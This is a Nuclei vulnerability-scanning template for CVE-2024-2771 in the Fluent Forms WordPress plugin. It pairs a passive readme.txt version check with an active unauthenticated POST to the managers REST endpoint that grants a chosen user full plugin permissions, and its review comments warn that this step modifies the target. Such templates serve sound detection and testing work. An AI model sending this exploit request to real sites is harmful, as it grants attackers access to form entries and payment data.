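id: CVE-2024-2771

info:
  name: Contact Form Plugin by Fluent Forms < 5.1.17 - Unauthenticated Limited Privilege Escalation
  author: Sourabh-Sahu
  severity: critical
  description: |
    The plugin is vulnerable to privilege escalation due to a missing capability check on the /wp-json/fluentform/v1/managers REST API endpoint. This makes it possible for unauthenticated attackers to grant users with Fluent Form management permissions which gives them access to all of the plugin's settings and features. This also makes it possible for unauthenticated attackers to delete manager accounts.
  impact: |
    Unauthenticated attackers can grant Fluent Form management permissions to any user account, providing access to all plugin settings and sensitive data.
  remediation: |
    Update Contact Form Plugin by Fluent Forms to version 5.1.17 or later.
  reference:
    - https://github.com/whale93/CVE-2024-2771-PoC
    - https://nvd.nist.gov/vuln/detail/CVE-2024-2771
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/071195d6-3452-4241-a8d3-92efc84e4850?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2771
    cwe-id: CWE-862
    epss-score: 0.21837
    epss-percentile: 0.95894
    cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    # Two raw requests are defined below; when the first does not match the
    # second is sent as well, so the per-host budget is 2, not 1.
    max-request: 2
    fofa-query: body="/wp-content/plugins/fluentform/"
    vendor: fluentforms
    product: contact_form
    framework: wordpress
  tags: cve,cve2024,wordpress,fluentforms,wp-plugin,unauth,wp,vkev,vuln

# Execution order (nuclei's JS-style flow, short-circuit evaluation):
#   http(1) is the passive readme.txt version check.
#   http(2) is the ACTIVE exploit and only runs when http(1) does NOT match
#   (readme missing/unreadable, or Stable tag >= 5.1.17).
# Consequence: the state-changing POST is sent against hosts whose version could
# not be confirmed vulnerable, and is skipped on hosts that could. If you want
# exploitation gated on a confirmed-vulnerable version, use `&&` instead; if you
# only want the passive check, remove http(2) from the flow.
flow: http(1) || http(2)

http:
  # Request 1: passive fingerprint. Extracts "Stable tag" from the plugin's
  # readme.txt and matches when it is below the fixed version 5.1.17.
  # NOTE(review): readme.txt can be deleted or stale on hardened installs, so
  # this check alone can produce false negatives — confirm against the
  # installed version when in doubt.
  - raw:
      - |
        GET /wp-content/plugins/fluentform/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '< 5.1.17')
        condition: and

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        # internal: the extracted value feeds compare_versions() above and is
        # not reported as output.
        internal: true

  # Request 2: ACTIVE, STATE-CHANGING exploit. Abuses the missing capability
  # check on the managers REST endpoint to grant the full Fluent Forms
  # permission set to an existing WordPress user, without authentication.
  #
  # Prerequisites / operator caveats:
  #   - `email` is NOT defined in this template; it must be supplied at run
  #     time (e.g. `-var email=<existing-user@example.com>`) and must belong to
  #     an existing WordPress account on the target, otherwise the endpoint
  #     will not report success.
  #   - A 200 with "Manager has been saved." means the target has been
  #     MODIFIED: that account now holds all plugin permissions listed below.
  #     Run only with explicit authorization and remove the manager entry
  #     afterwards (the description notes the same endpoint can delete
  #     managers; the cleanup request is not part of this template).
  - raw:
      - |
        POST /wp-json/fluentform/v1/managers HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Encoding: gzip, deflate, br

        {
          "manager": {
            "email": "{{email}}",
            "permissions": [
              "fluentform_dashboard_access",
              "fluentform_forms_manager",
              "fluentform_entries_viewer",
              "fluentform_manage_entries",
              "fluentform_view_payments",
              "fluentform_manage_payments",
              "fluentform_settings_manager",
              "fluentform_full_access"
            ]
          }
        }

    matchers:
      - type: dsl
        dsl:
          # All three must hold: success status, the plugin's own confirmation
          # string echoing the supplied email, and a JSON response (guards
          # against a generic HTML 200 page being counted as a hit).
          - "status_code == 200"
          - "contains_all(body, 'Manager has been saved.','{{email}}')"
          - "contains(content_type, 'application/json')"
        condition: and

# NOTE(review): the digest below signs the template body. Any edit to this file
# (including the ones above) invalidates it and the template must be re-signed,
# otherwise nuclei will treat it as unsigned.
# digest: 4b0a004830460221009e630231d1b078df1766c7df4f4c69534ddc08df63b1cbef8df53cd7bad06186022100bd1f14e1718af4ebd3f07a0750987bef4c4ebcf2f4175c4428afc8bb12739b9a:922c64590222798bb761d5b6d8e72950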